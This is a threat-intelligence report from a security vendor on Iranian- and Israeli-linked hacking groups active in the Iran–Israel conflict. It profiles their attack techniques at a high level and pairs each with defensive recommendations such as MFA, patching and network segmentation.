Cyber Threats Linked to Iran-Israel Conflict

Update: June 23, 2025

What to Know

• Department of Homeland Security issued an advisory about low-level cyberattacks targeting US networks by pro-Iranian hacktivists. Threats to watch: distributed denial of service (DDoS), operational technology (OT) device exploits, and espionage targeting defense sectors.

• Active groups so far include pro-Palestine group Handala, pro-Israel group "Predatory Sparrow," and pro-Iranian group "Team 313."

• Recommendations to mitigate risk include incorporating DoS protection, disabling any non-essential services (especially those associated with OT), and conducting a thorough review of all public-facing authentication portals.

  ---

Earlier today, Iran's Islamic Revolutionary Guard Corps fired missiles targeting US military bases in Qatar and Iraq, a response to the United States' strike on three Iranian nuclear facilities yesterday, June 22. Yesterday's strikes marked an escalation point in the ongoing Israel–Iran conflict.

On the cyber front, state-aligned cybercrime groups have been ramping up their efforts as well, notably:

• “Handala” Targets Multiple Israeli Organizations: The pro-Palestine hacking group Handala have listed several Israeli organizations on its data leak site beginning June 14, 2025. The group claims to have stolen over 2 terabytes of data from multiple Israeli firms, including a major oil and gas company.

• “Predatory Sparrow” Targets Iranian Bank and Crypto Exchange: The pro-Israel cyber threat group Predatory Sparrow claimed responsibility for an attack on Iran's state-owned Bank Sepah on or around June 17, 2025. The group also claimed responsibility for an attack on Iran's cryptocurrency exchange Nobitex on or around June 18.

• "Team 313" Takes Credit for Truth Social Outage: Earlier today, pro-Iranian activist group Team 313 claimed responsibility for a distributed denial-of-service (DDoS) attack on the Truth Social platform, citing the missile attacks on Iranian nuclear facilities as its motivation. This attribution has not yet been verified.

So far, the scope of the cyber conflict has been largely limited to participating countries, but following the United States' recent attacks, retaliation is highly likely in the near future (within one to four weeks), as Iranian officials have signaled intentions to respond. The Department of Homeland Security has issued an advisory warning about low-level cyberattacks targeting U.S. networks by pro-Iranian hacktivists, who are likely affiliated with the Iranian government.

Forecast

Iranian threats are expected to target organizations in the United States, particularly those conducting business with Israel or using Israeli equipment, such as programmable logic controllers (PLCs), through low-level attacks. Offensive operations will likely be carried out primarily by Iranian-affiliated hacktivist groups in the form of DDoS campaigns and by exploiting exposed operational technology (OT) devices. Targeted sectors are expected to face a mix of opportunistic attacks, which exploit organizations inadvertently exposing insecure OT devices, and deliberate denial-of-service attacks against entities or platforms involved in or supporting US efforts in the conflict.

High-impact cyberattacks designed to cause destruction are expected to coincide with kinetic operations to weaken a country's morale and disrupt its economy, similar to the attack conducted by Predatory Sparrow against the Bank of Sepah.

Additionally, Iran-backed groups (e.g., APT33) may target organizations that openly support war efforts against Iran, like an attack in 2014 that reportedly caused $40 million in damages to a Las Vegas casino after its CEO expressed support for stronger action against Iran. However, we anticipate that Iranian offensive cyber resources will likely focus on aligning with kinetic attacks against involved countries, prioritizing targets that advance their military objectives or enhance the effectiveness of their attacks, rather than expending resources on unrelated organizations.

Alongside complementing kinetic attacks against opposing countries, nation-backed threats (e.g., APT34) are likely to conduct espionage campaigns targeting organizations within or serving the defense and military sectors. The intent of these operations is to intercept strategic and tactical plans to aid in coordinating military actions and enhancing the effectiveness of offensive operations.

Recommendations

• Utilize a comprehensive, multilayered strategy to mitigate DDoS attacks by incorporating cloud-based DoS protection, traffic filtering, rate limiting, load balancing, and web application firewalls to block malicious requests and handle large traffic volumes effectively.

• Assess your organization's public-facing internet presence and disable any non-essential services, especially operational technology devices like human-machine interfaces (HMIs) and programmable logic controllers (PLCs).

• Conduct a thorough review of all public-facing authentication portals, including admin consoles, web-based management interfaces, operational technology (OT) devices, and other exposed systems. Identify any instances of default or weak credentials and replace them with strong, unique passwords immediately.

Published April 25, 2025

Key Points

• Escalated tensions between Iran and Israel could give rise to cyber threats.

• Several advanced persistent threat (APT) groups are involved on both sides: APT34, APT35, and CyberAv3ngers in Iran, and Predatory Sparrow in Israel.

• Iranian-affiliated APTs utilize a wide array of TTPs, including spearphishing and drive-by compromise, to significantly expand the attack surface for companies with ties to Israel or Israeli vendors.

• At-risk organizations can take basic measures to protect themselves from these APT groups, including user training, regular patching, and network segmentation.

In early April 2024, Israel and Iran engaged in retaliatory airstrikes, which resulted in the death of military personnel on both sides and allegedly caused damage to military assets in both nations. While both Iran and Israel have recently expressed their intention to defuse the situation, tensions remain high. These tensions extend to international businesses and corporations that work within the Israeli or Iranian economy. APT groups affiliated with either nation have demonstrated their capacity to launch sophisticated cyber campaigns, targeting not just governmental institutions but also corporate entities. Cyber attacks motivated by this conflict could lead to data breaches, operational disruptions, and reputational damage to brands.

This report examines three prominent advanced persistent threat (APT) groups (APT34, APT35, and CyberAv3ngers) based in or linked to Iran, known for targeting Israel and its associated entities. Additionally, the report includes a concise overview of a group (Predatory Sparrow) focusing on Iranian targets that is believed to be connected to Israel. We also delve into the common tactics, techniques, and procedures (TTPs) these groups utilize and present key advice for detection and mitigation of these threats. This report is particularly valuable for organizations engaged in business with Iran or Israel or their vendors or suppliers.

Iranian Threats

Strategic deployment of APT and hacktivist groups is a key component of Iran’s cyber warfare tactics. These groups are often ideologically driven, aiming to gather intelligence and disrupt the normal functioning of critical infrastructure and corporate entities. By infiltrating networks through sophisticated spearphishing campaigns, exploiting zero-day vulnerabilities, and deploying bespoke malware, these groups can steal sensitive information, damage systems, and cripple financial operations, causing significant economic and reputational harm.

Israeli government and military organizations and companies in integral business industries like finance, energy, telecommunications, and technology are natural targets whose disruption could undermine Israel’s economic stability and international standing. However, the threat from Iranian APT and hacktivist group also extends further:

• For foreign companies that conduct business with Israel-based firms or that operate within Israel: Cyber attacks by Iran-linked groups on these companies could result in severe operational disruptions and financial losses. The outcomes may include data breaches, compromise of sensitive information, significant operational downtime, and possibly reputational damage that could impact the company in other markets globally.

• For companies based outside Israel that use Israeli-based suppliers: If targeted by cyber attacks, these companies could face major supply-chain disruptions. The immediate effects could involve delays in product delivery, increased operational costs, and potentially a halt in production, affecting not just the directly targeted companies but also downstream customers relying on their products or services. Such a situation is especially concerning for companies or organizations that use operational technology (OT) to operate critical infrastructure, such as water treatment plants, electricity or other energy grids, and healthcare services.

• For critical sector organizations in the US and UK: Targeted cyber attacks against these entities could severely disrupt essential services, including power, water, and healthcare systems. The strategic response from these nations, coupled with their technological and infrastructural significance, makes them prime targets for cyber operations with the intent of undermining their support for Israel. Such attacks could not only compromise public safety and national security but also provoke economic instability by disrupting critical infrastructure.

• For companies operating in Middle Eastern countries that supported Israel’s response: Cyber attacks by Iran-linked groups carry substantial risks, given these countries’ strategic economic roles and geopolitical positions. In Jordan, cyber operations targeting the vital tourism and export sectors could lead to extensive economic repercussions amid an already dim economic outlook. The potential impact of such cyber attacks is even more significant in Saudi Arabia and the UAE, where attacks on oil and gas facilities could disturb global energy markets. Additionally, the UAE’s tech and finance sectors are liable to be prime targets for Iranian cyber attacks, which could erode investor confidence and inhibit innovation, affecting both the local economy and international investments.

This report profiles three Iranian-linked APT groups, outlining their tactics, techniques, and procedures (TTPs), while also providing customers with detection and mitigation strategies. APT34 is highlighted for its long-standing operations. APT35 is examined for its extensive campaigns against government, defense, and critical infrastructure entities in America, Europe, and the Middle East, utilizing spearphishing, social engineering, and bespoke malware. Lastly, the focus shifts to CyberAv3ngers, a group specializing in attacks on industrial control and operational technology systems, particularly through internet-connected programmable logic controllers (PLCs) and human-machine interfaces (HMI). This exploration emphasizes the growing convergence of IT and OT systems, underscoring the expanded attack surface and the internet as a prevalent entry point for cyber attacks.

APT34

The cyber espionage group APT34 (aka Twisted Kitten, Cobalt Gypsy, Crambus, Helix Kitten) focuses on infiltrating and conducting operations against high-value entities in the Middle East, including government bodies, critical infrastructure, telecommunications networks, and pivotal regional organizations. Its varied arsenal of techniques includes social engineering attacks via legitimate social networking sites, destructive operations using wiper malware, and exploiting trusted relationships to compromise supply chains. The following TTPs have featured prominently in many of the group’s campaigns.

T1566: Spearphishing Attachment

APT34 favors spearphishing to secure initial entry into target systems. The group employs social engineering tactics, often by attaching Microsoft Office or PDF documents laden with malware to its deceptive emails. To tackle the threat of spearphishing attacks, organizations should consider:

• Educating employees on the risks of spearphishing attacks, emphasizing the importance of scrutinizing email attachments and links, even if they appear to come from legitimate sources.

• Limiting user access rights within the organization to the minimum necessary to perform duties.

• Deploying sophisticated email filtering solutions that can detect and quarantine emails containing malicious attachments or suspicious links, particularly those mimicking Microsoft Office or PDF formats.

T1059: Command and Scripting Interpreter: PowerShell

APT34 has exploited PowerShell-based backdoors in cyber attacks across the Middle East, leveraging PowerShell’s ostensibly legitimate capabilities to create fileless malware that leaves no on-disk traces. This method allows for complex operations within the operating system, data exfiltration, and lateral network movement. Continuous reloading of malicious code into memory also ensures attacker persistence within compromised systems. To mitigate this technique, organizations should:

• Implement robust logging and monitoring of PowerShell activity to detect unusual or unauthorized commands that could indicate malicious behavior.

• If PowerShell usage is essential, limit its execution policy solely to administrators. Using PowerShell JEA (Just Enough Administration) can also help confine administrative tasks by restricting the commands that admins or users can run during remote PowerShell sessions.

• Regularly educate and train IT staff and system administrators on the potential misuse of PowerShell, including the latest tactics used by attackers, to better prepare them for identifying and mitigating such threats.

T1078: Valid Accounts

APT34 infiltrates systems by using legitimate credentials obtained from phishing or other means, enabling it to move laterally within networks undetected. This method allows the group to discreetly explore and exfiltrate sensitive data. Compromised credentials can be used to circumvent access controls across network systems, allow persistent remote system access via services like virtual private networks (VPNs) and remote desktops, and may enable attackers to access restricted network areas or obtain elevated system privileges. Combat this tactic by:

• Enforcing multifactor authentication (MFA) across all user accounts to add an additional layer of security, which can significantly reduce the risk of unauthorized access even if credentials are compromised.

• Conducting frequent audits of user accounts and monitoring for unusual activity patterns.

• Regularly educating and training IT staff and system administrators on the potential misuse of valid accounts, including the latest tactics used by attackers, to better prepare them for identifying and mitigating such threats.

APT35

Security researchers have linked APT35 (aka COBALT MIRAGE, PHOSPHORUS, G0059, NewsBeef, Charming Kitten, Magic Hound, TunnelVision, Ajax Security, Newscaster Team) to the Islamic Revolutionary Guard Corps (IRGC). APT35  conducts long-term, resource-intensive campaigns primarily targeting American, European, and Middle Eastern government, defense, and critical infrastructure organizations. APT35 primarily conducts cyber espionage using spearphishing, social engineering, and custom malware techniques; however, it has also exploited Microsoft BitLocker to encrypt targets’ data in exchange for ransom payments. Despite APT35’s adoption of diverse strategies, three specific TTPs are common vectors in its campaigns:

T193: Spearphishing Attachment

In one notable example of this tactic in use, APT35 was linked with a phishing campaign that targeted an Israeli journalist, using a fake draft report as bait. This deceptive draft report came as a password-protected RAR file that embedded a harmful LNK file designed to deploy the “PowerStar” malware—a refined variant of its established backdoor named “CharmPower.”

The following recommendations can help defend against spearphishing.

• Deploy data loss prevention (DLP) solutions to monitor and control data transfers, preventing sensitive information from being leaked or sent to unauthorized recipients.

• Implement protocols like Sender Policy Framework (SPF); DKIM; or Domain-based Message Authentication, Reporting & Conformance (DMARC) to help detect and prevent email spoofing, making it harder for attackers to impersonate legitimate entities.

• Conduct mock spearphishing campaigns to test employee awareness and preparedness, providing feedback and training as needed.

T1189: Drive-by Compromise

APT35 has used drive-by compromise techniques in its campaigns against Israel’s transportation, logistics, and technology sectors. The group has strategically manipulated legitimate websites to divert visitors to attacker-managed sites designed to phish for personal information and credentials. Once collected, this data is transmitted to a predefined domain for use in subsequent attacks. Recommended protective strategies include:

• Ensure that all web applications are up to date with the latest security patches to minimize vulnerabilities that could be exploited in drive-by compromise attacks.

• Use web filtering solutions to block known malicious sites and monitor web traffic for unusual redirections or attempts to access phishing sites.

• Regularly educate employees about the risks of drive-by compromises and train them to recognize phishing attempts, emphasizing the importance of not entering personal information or credentials on unfamiliar websites.

T1595: Active Scanning: Vulnerability Scanning

APT35 has conducted extensive scans to pinpoint public systems susceptible to specific vulnerabilities, including CVE-2021-44228 in Log4j, the ProxyShell set of vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in on-premises Microsoft Exchange Servers, and CVE-2018-13379 in Fortinet FortiOS Secure Sockets Layer (SSL) VPNs. Organizations should consider:

• Ensuring that all web applications, especially critical software such as VPNs, are up to date with the latest security patches to minimize vulnerabilities that could be exploited by threat actors using active scanning techniques.

• Dividing network resources into segments to reduce the attack surface and closely monitoring traffic for unusual patterns that could indicate a scanning attempt or exploitation.

• Applying strict access controls and authentication measures to all users and devices, limiting the potential impact of exploited vulnerabilities.

CyberAv3ngers

Active since 2020, CyberAv3ngers (aka CyberAveng3rs and Cyber Avengers) has been linked with the IRGC. CyberAv3ngers is a politically motivated group that primarily targets industrial control systems, OT, or critical infrastructure using programmable logic controllers (PLCs) and human machine interfaces (HMI) connected to the internet. On November 22, 2023, CyberAv3ngers carried out a successful cyber attack on multiple water and wastewater facilities in the US that were employing PLCs with HMIs built in Israel. The group likely gained access by exploiting internet-connected devices that were protected by default passwords. Public information on CyberAv3ngers’ TTPs is limited, but security researchers have highlighted its distinctive use of brute-force techniques.

T1110: Brute Force

Adversaries may use brute-force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. In the case of the CyberAv3ngers attack on water and wastewater facilities in the US, the attackers employed scanning tools to pinpoint accessible internet-connected devices. Subsequently, they gained entry by utilizing the default PLC credentials, which are often readily available in OT manuals available online. To protect against brute-force techniques, organizations should:

• Immediately update default usernames and passwords for all OT devices to unique, strong credentials to prevent unauthorized access.

• Implement routine scanning of networked devices to identify and secure internet-facing devices that may be vulnerable to unauthorized access.

• Enhance network security measures by employing firewalls, VPNs, and network segmentation to limit the exposure of critical OT devices to the internet

Israeli Threats

The full extent of Israel’s cyber offensive capabilities is largely speculative: Cybersecurity research and intelligence analysis has hypothesized about Israel’s cyber activities, but the Israeli government does not admit to engaging in offensive cyber operations through affiliated entities. This approach helps to keep cyber warfare tactics confidential, minimize diplomatic fallout, and maintain plausible deniability in the international arena. Hypothetically, Israeli cyber initiatives targeting Iran would be motivated by a desire to thwart Iran’s nuclear plans, collect vital intelligence, and bolster national security through the proactive neutralization of threats. Thereby, in targeting Iran, Israeli cyber groups might focus on critical sectors, such as defense and nuclear research, alongside communication and financial systems. Such attacks would aim to strategically weaken Iran’s capabilities and apply economic strain.

Organizations should remain vigilant about the potential repercussions of Israeli cyber activities against Iranian interests. Such actions could provoke retaliatory cyber attacks from Iranian actors, not only against Israeli entities but also against international businesses perceived to have business ties with Israeli companies. These tit-for-tat attacks could expose these organizations to data breaches, operational disruptions, and compromise of sensitive information. Understanding this dynamic is vital for businesses to prepare and strengthen their cybersecurity defenses, anticipating the broader implications of geopolitical tensions manifesting in the cyber realm. This awareness is especially important for entities with ties to Israel, as they may inadvertently become targets in the escalating cyber conflict between these nations.

In light of these conditions, the following section of the report covers a prominent Israel-linked group that has focused on targeting Iranian critical infrastructure.

Predatory Sparrow

Active since 2021, Predatory Sparrow (aka Gonjeshke Darande) has claimed responsibility for cyber attacks on Iranian industrial plants and critical infrastructure. In 2021, the group disrupted Iran’s nationwide network of 4,300 gas stations by disabling the system for purchasing fuel with government-issued subsidy cards. The following year, they escalated their activities by targeting three state-owned industrial steel factories, hijacking control systems to cause equipment malfunctions and molten steel spills, resulting in significant fire damage. Continuing their offensive into 2023, Predatory Sparrow claimed to have incapacitated 70 percent of Iranian gas station infrastructure, severely hampering the country’s fuel distribution capabilities.

Although Predatory Sparrow’s cyber attacks have garnered significant attention, the reluctance of Iran to disclose details related to assaults on its critical infrastructure has led to a lack of information regarding the group’s specific TTPs. Nevertheless, insights from the ReliaQuest Threat Research Team, particularly their analyses on the targeting of Operational Technology (OT) systems by Chinese Advanced Persistent Threat (APT) groups, allow us to infer the likely TTPs employed by entities akin to Predatory Sparrow in its operations against such targets. This knowledge base provides a foundational understanding of the operational methodologies potentially utilized by Predatory Sparrow in its cyber campaigns.

T1021.001: Remote Services: Remote Desktop Protocol

Adversaries may use valid accounts to log in to a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Threat actors such as Predatory Sparrow can use this technique to move laterally to the domain controller (DC) via an interactive RDP session using a compromised account with domain administrator privileges. Combat this threat by:

• Disabling remote interactive logon of service accounts to prevent them from being used for RDP.

• Configuring and enabling MFA for RDP sessions, helping to prevent lateral RDP and RDP brute-forcing.

• Adhering to the principle of least privilege and minimizing RDP to only the required accounts. Configure access to critical assets that require RDP to use designated jump boxes, allowing tighter access control and improved auditing.

T1190: Exploit Public-Facing Application

Through this approach, attackers aim to leverage vulnerabilities in external-facing systems or devices to gain initial entry into a network. These vulnerabilities could stem from software bugs, temporary system faults, or configuration errors. Specifically, adversaries often target edge network devices and infrastructure components lacking strong host-based protections. APT groups frequently exploit flaws in networking appliances, including manufacturers like Fortinet, Ivanti, NETGEAR, Citrix, and Cisco, to infiltrate networks. To protect against these types of attacks, organizations can:

• Utilize security tools, such as a web application firewall (WAF), to protect public-facing applications and provide logging visibility into access and requests to and from the application.

• Properly segment all public-facing applications from the intranet to minimize risk of exploitation compromising sensitive infrastructure.

• Adhere to a robust and frequent vulnerability assessment and patching cycle for all public-facing appliances. In case of a zero-day exploitation of a vulnerability, develop and maintain an emergency patch and mitigation plan.

T1105: Ingress Tool Transfer

This TTP allows attackers to import tools or files from an external source into a breached network. They might transfer these assets from a system they control to the target network either via the command-and-control (C2) channel or using other protocols like file transfer protocol (FTP). Once these tools or files are within the compromised environment, attackers can further distribute them across multiple devices within that network. For example, in the 2015 attack on Ukraine’s electric power facilities, the Sandworm Team, a Russian APT group, deployed additional malicious software onto already compromised systems to exfiltrate credentials, facilitate lateral movement, and ultimately destroy data. To defend against such tactics, organizations can implement the following processes.

• Utilize application control solutions to help prevent threat actors from evading defenses. This can be achieved by using less-common methods of resource retrieval, such as via “certutil.”

• Maintain an up-to-date block list of known hosting sites and actively monitor outbound request attempts through your forward proxy.

• If an endpoint detection and response (EDR) solution is not available, leverage Sysmon Event ID 3 to log and monitor process executions generating network connections.

Threat Forecast

In the short to medium term, Israeli linked groups, motivated by a need to thwart Iran’s influence and nuclear prospects, will likely seek to continue cyber espionage and disruption efforts. Furthermore, the use of cyber mercenaries or loosely affiliated hacktivist groups such as Predatory Sparrow introduce further unpredictable elements into the conflict, making attribution and response more challenging. Similarly, Iranian APT and hacktivist groups are poised to intensify their cyber campaigns against Israeli interests, employing tactics aimed at espionage, sabotage, and propaganda spread. As both nations continue to invest heavily in cyber defense and offensive capabilities, the potential for a significant cyber incident remains elevated.

Given these conditions, it is important for organizations, especially those with business interests the affected nations, to keep abreast of developments. Staying informed about geopolitical shifts and related cyber threats is key to customizing security measures effectively. Enhancing their cybersecurity posture will enable organizations to protect their assets and maintain operational continuity amidst regional instability.

What ReliaQuest Is Doing

The ReliaQuest Threat Research team is monitoring these threat groups, continuously refining our detection capabilities and hunting methodologies to identify and alert our customers about significant TTPs utilized by adversaries like the groups mentioned in this report. Our threat hunting team actively monitors our customers’ public-facing infrastructure for exposed and susceptible services (such as RDP) that are commonly abused by threat actors looking to gain initial access.

In addition to creating specific detection rules for each of the TTPs mentioned, ReliaQuest also provides intelligence updates and detailed threat profiles through the GreyMatter Intelligence content library, covering aspects like TTPs, indicators of compromise (IoCs), tools, and information on specific attacks and campaigns. The ReliaQuest threat intelligence team also regularly incorporates high-fidelity IoCs into our threat intelligence feeds to enhance detection capabilities.